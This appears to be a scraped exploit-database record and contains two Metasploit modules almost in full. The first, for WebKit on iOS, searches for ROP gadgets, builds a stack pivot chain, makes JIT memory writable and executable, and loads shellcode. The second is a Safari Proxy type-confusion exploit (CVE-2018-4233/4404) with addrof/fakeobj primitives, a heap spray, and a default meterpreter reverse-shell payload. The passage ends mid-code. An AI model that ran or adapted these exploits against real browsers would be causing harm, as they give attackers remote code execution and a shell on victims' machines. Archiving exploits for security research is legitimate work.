Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k]) \nif (keys.length == 0) break; \n \nvar addr = Add(memory.readInt64(Add(base, o + 0x20)), cache_slide) \nvar size = memory.u32(Add(base, o + 0x28)) \n \n// Copy the entire __text region into a Uint32Array for faster processing. \n// Previously you could map a Uint32Array over the data, but on i7+ devices \n// this caused access violations. \n// Instead we read the entire region and copy it into a Uint32Array. The \n// memory.read primitive has a weird limitation where it's only able to read \n// up to 4096 bytes. to get around this we'll read multiple times and combine \n// them into one. \n \nvar allData = new Uint32Array(size / 4) \nfor (var r = 0; r < size; r += 4096) { \n// Check to ensure we don't read out of the region we want \nvar qty = 4096 \nif (size - r < qty) { \nqty = size - r \n} \nvar data = memory.read(Add(addr, r), qty) \n \n// Data is an array of single bytes. This code takes four entries \n// and converts them into a single 32-bit integer. It then adds it \n// into the `allData` array at the given index \nfor (var h = 0; h < qty; h += 4) { \nvar fourBytes = b2u32(data.slice(h, h + 4)) \nallData[(r + h) / 4] = fourBytes \n} \n} \n \n// Loop through the entire data map looking for each gadget we need \nfor (var f = 0; f < size && keys.length > 0; f++) { \n \n// Check every gadget \nfor (var z = 0; z < keys.length; z++) { \nvar key = keys[z]; \nvar opcode_list = opcodes[key]; \nfor (var y = 0; y < opcode_list.length; y++) { \nvar opcode = opcode_list[y]; \nfor (var t = 0; t < opcode.length; t++) { \nvar op = allData[f+t]; \nif (op == opcode[t]) { \nif (t == opcode.length - 1) { \ngadgets[key] = Add(addr, f*4); \nkeys.splice(z, 1); \nz = keys.length; \nbreak; \n} \ncontinue; \n} \nbreak; \n} \n} \n} \n} \n \nbreak; \n} \no += 0x50; \n} \nbreak; \n} \noff += memory.u32(Add(base, off + 0x4)); \n} \ncontinue; \n} \nvar lookup = null; \nfor(var k = Object.keys(libs), j = 0; j < k.length; ++j) \n{ \nif(strcmp(fn, k[j])) \n{ \nlookup = libs[k[j]]; \nbreak; \n} \n} \nif(lookup != null) \n{ \nfsyms(memory, base, segs, lookup, syms); \n} \n} \n \nvar vals = Object.keys(libs).map(function(key) { \nreturn libs[key]; \n}); \nvar k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []); \nfor(var i = 0; i < k.length; ++i) \n{ \nvar s = k[i]; \nif(syms[s] == null) \n{ \nfail(s); \n} \nsyms[s] = Add(syms[s], cache_slide); \n} \nk = Object.keys(opcodes); \nfor(var i = 0; i < k.length; ++i) \n{ \nvar s = k[i]; \nif(gadgets[s] == null) \n{ \nfail(s); \n} \n} \n \noffsets = {} \noffsets[\"regloader\"] = gadgets[\"regloader\"]; \noffsets[\"dispatch\"] = gadgets[\"dispatch\"]; \noffsets[\"stackloader\"] = gadgets[\"stackloader\"]; \noffsets[\"ldrx8\"] = gadgets[\"ldrx8\"]; \noffsets[\"movx4\"] = gadgets[\"movx4\"]; \noffsets[\"__longjmp\"] = syms[\"__longjmp\"]; \noffsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"]; \noffsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"]; \noffsets[\"_dlopen\"] = syms[\"_dlopen\"]; \noffsets[\"_dlsym\"] = syms[\"_dlsym\"]; \noffsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"]; \noffsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"]; \noffsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"]; \noffsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]; \n \nif (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) { \noffsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8); \n} \n#{ ios_11 ? ' \nif (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) { \noffsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8); \n}' : ''} \n \n#{dump_offsets} \n \n} \n \n \nvar regloader = offsets[\"regloader\"]; \nvar dispatch = offsets[\"dispatch\"]; \nvar stackloader = offsets[\"stackloader\"]; \nvar longjmp = offsets[\"__longjmp\"]; \nvar mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"]; \nvar memmove = offsets[\"__platform_memmove\"]; \nvar dlopen = offsets[\"_dlopen\"]; \nvar dlsym = offsets[\"_dlsym\"]; \nvar task_self = offsets[\"_mach_task_self_\"] \nvar endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"]; \nvar startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"]; \n \nvar ldrx8 = offsets[\"ldrx8\"]; // might be null \nvar movx4 = offsets[\"movx4\"]; // might be null \n \nvar mach_task_self_ = new Int64(memory.readInt64(task_self).lo()); \nvar memPoolEnd = memory.readInt64(endOfFixedMem); \n \nvar memPoolStart = Int64.Zero; \nif (startOfFixedMem) { \nmemPoolStart = memory.readInt64(startOfFixedMem); \n} \n \nvar jitWriteSeparateHeaps = Int64.Zero; \nif (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) { \njitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]); \n} \n \nvar shsz = new Int64(\"0x100000\"); \nvar paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10)); \nvar codeAddr = Sub(memPoolEnd, shsz); \ncodeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff); \n \nmemory.writeInt64(Add(vtab, 0x18), longjmp); \nmemory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget) \n \nvar arrsz = 0x100000, \noff = 0x1000; \nvar arr = new Uint32Array(arrsz); \nvar stack = memory.readInt64(Add(stage1.addrof(arr), 0x10)); \n \nvar pos = arrsz - off; \n \nvar add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) { \nx4 = x4 || Int64.Zero \n \n// in stackloader: \narr[pos++] = 0xdead0010; // unused \narr[pos++] = 0xdead0011; // unused \narr[pos++] = 0xdead0012; // unused \narr[pos++] = 0xdead0013; // unused \narr[pos++] = dispatch.lo(); // x28 (gadget for regloader) \narr[pos++] = dispatch.hi(); // x28 (gadget for regloader) \narr[pos++] = 0xdead0014; // x27 (unused) \narr[pos++] = 0xdead0015; // x27 (unused) \narr[pos++] = x4.lo(); // x26 == x4 (arg5) \narr[pos++] = x4.hi(); // x26 == x4 (arg5) \narr[pos++] = x3.lo(); // x25 == x3 (arg4) \narr[pos++] = x3.hi(); // x25 == x3 (arg4) \narr[pos++] = x2.lo(); // x24 == x2 (arg3) \narr[pos++] = x2.hi(); // x24 == x2 (arg3) \narr[pos++] = x0.lo(); // x23 == x0 (arg1) \narr[pos++] = x0.hi(); // x23 == x0 (arg1) \narr[pos++] = x1.lo(); // x22 == x1 (arg2) \narr[pos++] = x1.hi(); // x22 == x1 (arg2) \narr[pos++] = func.lo(); // x21 (func) \narr[pos++] = func.hi(); // x21 (func) \narr[pos++] = 0xdbad0018; // x20 (unused) \narr[pos++] = 0xdbad0019; // x20 (unused) \narr[pos++] = 0xdead001a; // x19 (unused) \narr[pos++] = 0xdead001b; // x19 (unused) \nvar tmppos = pos; \narr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29 \narr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29 \narr[pos++] = regloader.lo(); // x30 (first gadget) \narr[pos++] = regloader.hi(); // x30 (first gadget) \n \n// after dispatch: \narr[pos++] = 0xdead0020; // unused \narr[pos++] = 0xdead0021; // unused \narr[pos++] = 0xdead0022; // unused \narr[pos++] = 0xdead0023; // unused \narr[pos++] = 0xdead0024; // x22 (unused) \narr[pos++] = 0xdead0025; // x22 (unused) \narr[pos++] = 0xdead0026; // x21 (unused) \narr[pos++] = 0xdead0027; // x21 (unused) \narr[pos++] = 0xdead0028; // x20 (unused) \narr[pos++] = 0xdead0029; // x20 (unused) \narr[pos++] = 0xdead002a; // x19 (unused) \narr[pos++] = 0xdead002b; // x19 (unused) \ntmppos = pos; \narr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29 \narr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29 \narr[pos++] = jump_to.lo(); // x30 (gadget) \narr[pos++] = jump_to.hi(); // x30 (gadget) \n} \n \nvar add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) { \n//alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`); \n//x4 = x4 || Int64.One \n// in stackloader: \narr[pos++] = 0xdead0010; // unused \narr[pos++] = 0xdead0011; // unused \narr[pos++] = 0xdead0012; // unused \narr[pos++] = 0xdead0013; // unused \narr[pos++] = 0xdead1101; // x28 (unused) \narr[pos++] = 0xdead1102; // x28 (unused) \narr[pos++] = 0xdead0014; // x27 == x6 (unused) \narr[pos++] = 0xdead0015; // x27 == x6 (unused) \narr[pos++] = 0xdead0016; // x26 (unused) \narr[pos++] = 0xdead0017; // x26 (unused) \narr[pos++] = x3.lo(); // x25 == x3 (arg4) \narr[pos++] = x3.hi(); // x25 == x3 (arg4) \narr[pos++] = x0.lo(); // x24 == x0 (arg1) \narr[pos++] = x0.hi(); // x24 == x0 (arg1) \narr[pos++] = x2.lo(); // x23 == x2 (arg3) \narr[pos++] = x2.hi(); // x23 == x2 (arg3) \narr[pos++] = x3.lo(); // x22 == x3 (arg4) \narr[pos++] = x3.hi(); // x22 == x3 (arg4) \narr[pos++] = func.lo(); // x21 (target for dispatch) \narr[pos++] = func.hi(); // x21 (target for dispatch) \narr[pos++] = 0xdead0018; // x20 (unused) \narr[pos++] = 0xdead0019; // x20 (unused) \nvar tmppos = pos; \narr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = 0xdead001c; // x29 (unused) \narr[pos++] = 0xdead001d; // x29 (unused) \narr[pos++] = ldrx8.lo(); // x30 (next gadget) \narr[pos++] = ldrx8.hi(); // x30 (next gadget) \n \n// in ldrx8 \nif (x4) { \narr[pos++] = stackloader.lo(); \narr[pos++] = stackloader.hi(); \n} else { \narr[pos++] = dispatch.lo(); // x8 (target for regloader) \narr[pos++] = dispatch.hi(); // x8 (target for regloader) \n} \narr[pos++] = 0xdead1401; // (unused) \narr[pos++] = 0xdead1402; // (unused) \narr[pos++] = 0xdead1301; // x20 (unused) \narr[pos++] = 0xdead1302; // x20 (unused) \narr[pos++] = x1.lo(); // x19 == x1 (arg2) \narr[pos++] = x1.hi(); // x19 == x1 (arg2) \narr[pos++] = 0xdead1201; // x29 (unused) \narr[pos++] = 0xdead1202; // x29 (unused) \narr[pos++] = regloader.lo(); // x30 (next gadget) \narr[pos++] = regloader.hi(); // x30 (next gadget) \n \n// in regloader \n// NOTE: REGLOADER DOES NOT ADJUST SP! \n// sometimes i didn't get expected value in x4 \n// and i have no fucking idea why \n// usleep likely did the trick, but I would still keep the code \n// with movx4 \n//arr[pos++] = x4.lo() // x4 (should be -- but see lines above) \n//arr[pos++] = x4.hi() // x4 (should be -- but see lines above) \n \nif (x4) { \n// in stackloader: \narr[pos++] = 0xdaad0010; // unused \narr[pos++] = 0xdaad0011; // unused \narr[pos++] = 0xdaad0012; // unused \narr[pos++] = 0xdaad0013; // unused \narr[pos++] = 0xdaad1101; // x28 (unused) \narr[pos++] = 0xdaad1102; // x28 (unused) \narr[pos++] = 0xdaad0014; // x27 == x6 (unused) \narr[pos++] = 0xdaad0015; // x27 == x6 (unused) \narr[pos++] = 0xdaad0016; // x26 (unused) \narr[pos++] = 0xdaad0017; // x26 (unused) \narr[pos++] = 0xdaad0018; // x25 (unused) \narr[pos++] = 0xdaad0019; // x25 (unused) \narr[pos++] = 0xdaad00f0; // x24 (unused) \narr[pos++] = 0xdaad00f1; // x24 (unused) \narr[pos++] = 0xdaad00f2; // x23 (unused) \narr[pos++] = 0xdaad00f3; // x23 (unused) \narr[pos++] = 0xdaad00f4; // x22 (unused) \narr[pos++] = 0xdaad00f5; // x22 (unused) \narr[pos++] = func.lo(); // x21 (target for dispatch) \narr[pos++] = func.hi(); // x21 (target for dispatch) \narr[pos++] = 0xdaad0018; // x20 (unused) \narr[pos++] = 0xdaad0019; // x20 (unused) \ntmppos = pos; \narr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = 0xdaad001c; // x29 (unused) \narr[pos++] = 0xdaad001d; // x29 (unused) \narr[pos++] = ldrx8.lo(); // x30 (next gadget) \narr[pos++] = ldrx8.hi(); // x30 (next gadget) \n \n// in ldrx8 \narr[pos++] = dispatch.lo(); // x8 (target for movx4) \narr[pos++] = dispatch.hi(); // x8 (target for movx4) \narr[pos++] = 0xdaad1401; // (unused) \narr[pos++] = 0xdaad1402; // (unused) \narr[pos++] = x4.lo(); // x20 == x4 (arg5) \narr[pos++] = x4.hi(); // x20 == x4 (arg5) \narr[pos++] = 0xdaad1301; // x19 (unused) \narr[pos++] = 0xdaad1302; // x19 (unused) \narr[pos++] = 0xdaad1201; // x29 (unused) \narr[pos++] = 0xdaad1202; // x29 (unused) \narr[pos++] = movx4.lo(); // x30 (next gadget) \narr[pos++] = movx4.hi(); // x30 (next gadget) \n} \n \n// after dispatch: \n \n// keep only one: these or 0xdeaded01 \narr[pos++] = 0xdead0022; // unused \narr[pos++] = 0xdead0023; // unused \n \narr[pos++] = 0xdead0022; // unused \narr[pos++] = 0xdead0023; // unused \narr[pos++] = 0xdead0024; // x22 (unused) \narr[pos++] = 0xdead0025; // x22 (unused) \narr[pos++] = 0xdead0026; // x21 (unused) \narr[pos++] = 0xdead0027; // x21 (unused) \narr[pos++] = 0xdead0028; // x20 (unused) \narr[pos++] = 0xdead0029; // x20 (unused) \narr[pos++] = 0xdead002a; // x19 (unused) \narr[pos++] = 0xdead002b; // x19 (unused) \narr[pos++] = 0xdead002c; // x29 (unused) \narr[pos++] = 0xdead002d; // x29 (unused) \narr[pos++] = jump_to.lo(); // x30 (gadget) \narr[pos++] = jump_to.hi(); // x30 (gadget) \n} \n \nvar add_call = function(func, x0, x1, x2, x3, x4, jump_to) { \nx0 = x0 || Int64.Zero \nx1 = x1 || Int64.Zero \nx2 = x2 || Int64.Zero \nx3 = x3 || Int64.Zero \njump_to = jump_to || stackloader \n \nreturn (ldrx8 ? add_call_via_x8 : add_call_llvm)( \nfunc, x0, x1, x2, x3, x4, jump_to \n) \n} \n \n#{ios_11 ? ' \nif (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) { \nadd_call(jitWriteSeparateHeaps \n, Sub(codeAddr, memPoolStart) // off \n, paddr // src \n, shsz // size \n); \n} else { \nfail(\"jitWrite\"); \n} \n' : ' \nadd_call(mach_vm_protect, \nmach_task_self_, // task \ncodeAddr, // addr \nshsz, // size \nnew Int64(0), // set maximum \nnew Int64(7) // prot (RWX) \n); \n \nadd_call(memmove, \ncodeAddr, // dst \npaddr, // src \nshsz // size \n); \n'} \n \nadd_call(codeAddr, \ndlopen, \ndlsym, \njitWriteSeparateHeaps, \nmemPoolStart, \nmemPoolEnd, \n); \n \nfor(var i = 0; i < 0x20; ++i) \n{ \narr[pos++] = 0xde00c0de + (i<<16); \n} \n \nvar sp = Add(stack, (arrsz - off) * 4); \nmemory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29 \nmemory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp) \n \n// trigger \n//print(\"u rdy?\") \nwrapper.addEventListener(\"click\", function(){}); \n \n} \n \n#{get_mem_rw} \n \nfunction go() { \ntry { \nvar req = new XMLHttpRequest; \nreq.open(\"GET\", \"exploit\"); \nreq.responseType = \"arraybuffer\"; \nreq.addEventListener(\"load\", function() { \ntry { \nif (req.responseType != \"arraybuffer\") throw \"y u no blob\"; \npayload.set(new Uint8Array(req.response), 0x0); \npwn(); \n} catch (e) { \nfail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\")) \n} \n}); \nreq.addEventListener(\"error\", function(ev) { \nfail(ev) \n}); \nreq.send() \n} catch (e) { \nfail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\")) \n} \n}; \n \ngo(); \n \n</script> \n</body> \n</html> \n^ \nunless datastore['DEBUG_EXPLOIT'] \nhtml.gsub!(/\\/\\/.*$/, '') # strip comments \nhtml.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/153148/webkit_createthis.rb.txt", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-04T17:20:24", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-12-14T00:00:00", "type": "exploitdb", "title": "Safari - Proxy Object Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-4233", "2018-4404", "CVE-2018-4233", "CVE-2018-4404"], "modified": "2018-12-14T00:00:00", "id": "EDB-ID:45998", "href": "https://www.exploit-db.com/exploits/45998", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari Proxy Object Type Confusion',\r\n 'Description' => %q{\r\n This module exploits a type confusion bug in the Javascript Proxy object in\r\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\r\n it is possible to run arbitrary JS code during the execution of a CreateThis\r\n operation. This makes it possible to change the structure of e.g. an argument\r\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\r\n\r\n The JIT region is then replaced with shellcode which loads the second stage.\r\n The second stage exploits a logic error in libxpc, which uses command execution\r\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'saelo' ],\r\n 'References' => [\r\n ['CVE', '2018-4233'],\r\n ['CVE', '2018-4404'],\r\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\r\n ['URL', 'https://github.com/saelo/pwn2own2018'],\r\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\r\n ],\r\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\r\n 'Platform' => 'osx',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\r\n 'Targets' => [\r\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\r\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\r\n ],\r\n 'DisclosureDate' => 'Mar 15 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\r\n ])\r\n end\r\n\r\n def offset_table\r\n {\r\n '10.12.6' => {\r\n :jsc_vtab => '0x0000d8d8',\r\n :dyld_stub_loader => '0x00001168',\r\n :dlopen => '0x000027f7',\r\n :confstr => '0x00002c84',\r\n :strlen => '0x00001b40',\r\n :strlen_got => '0xdc0',\r\n },\r\n '10.13' => {\r\n :jsc_vtab => '0x0000e5f8',\r\n :dyld_stub_loader => '0x000012a8',\r\n :dlopen => '0x00002e60',\r\n :confstr => '0x000024fc',\r\n :strlen => '0x00001440',\r\n :strlen_got => '0xee8',\r\n },\r\n '10.13.3' => {\r\n :jsc_vtab => '0xe5e8',\r\n :dyld_stub_loader => '0x1278',\r\n :dlopen => '0x2e30',\r\n :confstr => '0x24dc',\r\n :strlen => '0x1420',\r\n :strlen_got => '0xee0',\r\n },\r\n }\r\n end\r\n\r\n def exploit_data(directory, file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', directory, file\r\n ::File.binread path\r\n end\r\n\r\n def stage1_js\r\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\r\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\r\n end\r\n\r\n def stage2_js\r\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\r\n payload_cmd = payload.raw\r\n if target['Arch'] == ARCH_PYTHON\r\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\r\n end\r\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\r\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\r\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\r\n end\r\n\r\n def get_offsets(user_agent)\r\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\r\n version = $1.gsub(\"_\", \".\")\r\n mac_osx_version = Gem::Version.new(version)\r\n if mac_osx_version >= Gem::Version.new('10.13.4')\r\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\r\n elsif mac_osx_version < Gem::Version.new('10.12')\r\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\r\n elsif offset_table.key?(version)\r\n offset = offset_table[version]\r\n return <<-EOF\r\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\r\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\r\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\r\nconst CONFSTR_OFFSET = #{offset[:confstr]};\r\nconst STRLEN_OFFSET = #{offset[:strlen]};\r\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\r\nEOF\r\n else\r\n print_warning \"No offsets for version #{mac_osx_version}\"\r\n end\r\n else\r\n print_warning \"Unexpected User-Agent\"\r\n end\r\n return false\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n user_agent = request['User-Agent']\r\n print_status(\"Request from #{user_agent}\")\r\n offsets = get_offsets(user_agent)\r\n unless offsets\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\r\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\r\n html = %Q^\r\n<html>\r\n<body>\r\n<script>\r\n#{stage1_js}\r\nstage1.replace = function(oldVal, newVal) {\r\n for (var idx = 0; idx < this.length; idx++) {\r\n var found = true;\r\n for (var j = idx; j < idx + 8; j++) {\r\n if (this[j] != oldVal.byteAt(j - idx)) {\r\n found = false;\r\n break;\r\n }\r\n }\r\n if (found)\r\n break;\r\n }\r\n this.set(newVal.bytes(), idx);\r\n};\r\n#{stage2_js}\r\n#{utils}\r\n#{int64}\r\n#{offsets}\r\n\r\nvar ready = new Promise(function(resolve) {\r\n if (typeof(window) === 'undefined')\r\n resolve();\r\n else\r\n window.onload = function() {\r\n resolve();\r\n }\r\n});\r\n\r\nready = Promise.all([ready]);\r\n\r\nprint = function(msg) {\r\n //console.log(msg);\r\n //document.body.innerText += msg + '\\\\n';\r\n}\r\n\r\n// Must create this indexing type transition first,\r\n// otherwise the JIT will deoptimize later.\r\nvar a = [13.37, 13.37];\r\na[0] = {};\r\n\r\nvar referenceFloat64Array = new Float64Array(0x1000);\r\n\r\n//\r\n// Bug: the DFG JIT does not take into account that, through the use of a\r\n// Proxy, it is possible to run arbitrary JS code during the execution of a\r\n// CreateThis operation. This makes it possible to change the structure of e.g.\r\n// an argument without causing a bailout, leading to a type confusion.\r\n//\r\n\r\n//\r\n// addrof primitive\r\n//\r\nfunction setupAddrof() {\r\n function InfoLeaker(a) {\r\n this.address = a[0];\r\n }\r\n\r\n var trigger = false;\r\n var leakme = null;\r\n var arg = null;\r\n\r\n var handler = {\r\n get(target, propname) {\r\n if (trigger)\r\n arg[0] = leakme;\r\n return target[propname];\r\n },\r\n };\r\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\r\n\r\n for (var i = 0; i < 100000; i++) {\r\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\r\n }\r\n\r\n trigger = true;\r\n\r\n return function(obj) {\r\n leakme = obj;\r\n arg = [1.1, 1.1];\r\n var o = new InfoLeakerProxy(arg);\r\n return o.address;\r\n };\r\n}\r\n\r\n//\r\n// fakeobj primitive\r\n//\r\nfunction setupFakeobj() {\r\n function ObjFaker(a, address) {\r\n a[0] = address;\r\n }\r\n\r\n var trigger = false;\r\n var arg = null;\r\n\r\n var handler = {\r\n get(target, propname) {\r\n if (trigger)\r\n arg[0] = {};\r\n return target[propname];\r\n },\r\n };\r\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\r\n\r\n for (var i = 0; i < 100000; i++) {\r\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\r\n }\r\n\r\n trigger = true;\r\n\r\n return function(address) {\r\n arg = [1.1, 1.1];\r\n var o = new ObjFakerProxy(arg, address);\r\n return arg[0];\r\n };\r\n}\r\n\r\nfunction makeJITCompiledFunction() {\r\n // Some code to avoid inlining...\r\n function target(num) {\r\n for (var i = 2; i < num; i++) {\r\n if (num % i === 0) {\r\n return false;\r\n }\r\n }\r\n return true;\r\n }\r\n\r\n // Force JIT compilation.\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n return target;\r\n}\r\n\r\nfunction pwn() {\r\n // Spray Float64Array structures so that structure ID 0x1000 will\r\n // be a Float64Array with very high probability\r\n var structs = [];\r\n for (var i = 0; i < 0x1000; i++) {\r\n var a = new Float64Array(1);\r\n a['prop' + i] = 1337;\r\n structs.push(a);\r\n }\r\n\r\n // Setup exploit primitives\r\n var addrofOnce = setupAddrof();\r\n var fakeobjOnce = setupFakeobj();\r\n\r\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\r\n /*\r\n var stuff = [];\r\n for (var i = 0; i < 0x100000; i++) {\r\n stuff.push({foo: i});\r\n }\r\n */\r\n\r\n var float64MemView = new Float64Array(0x200);\r\n var uint8MemView = new Uint8Array(0x1000);\r\n\r\n // Setup container to host the fake Float64Array\r\n var jsCellHeader = new Int64([\r\n 00, 0x10, 00, 00, // m_structureID\r\n 0x0, // m_indexingType\r\n 0x2b, // m_type\r\n 0x08, // m_flags\r\n 0x1 // m_cellState\r\n ]);\r\n\r\n var container = {\r\n jsCellHeader: jsCellHeader.asJSValue(),\r\n butterfly: null,\r\n vector: float64MemView,\r\n length: (new Int64('0x0001000000001337')).asJSValue(),\r\n mode: {}, // an empty object, we'll need that later\r\n };\r\n\r\n // Leak address and inject fake object\r\n // RawAddr == address in float64 form\r\n var containerRawAddr = addrofOnce(container);\r\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\r\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\r\n\r\n ///\r\n /// BEGIN CRITICAL SECTION\r\n ///\r\n /// Objects are corrupted, a GC would now crash the process.\r\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\r\n ///\r\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\r\n while (!(driver instanceof Float64Array)) {\r\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\r\n container.jsCellHeader = jsCellHeader.asJSValue();\r\n }\r\n\r\n // Get some addresses that we'll need to repair our objects. We'll abuse the .mode\r\n // property of the container to leak addresses.\r\n driver[2] = containerRawAddr;\r\n var emptyObjectRawAddr = float64MemView[6];\r\n container.mode = referenceFloat64Array;\r\n var referenceFloat64ArrayRawAddr = float64MemView[6];\r\n\r\n // Fixup the JSCell header of the container to make it look like an empty object.\r\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\r\n driver[2] = emptyObjectRawAddr;\r\n var header = float64MemView[0];\r\n driver[2] = containerRawAddr;\r\n float64MemView[0] 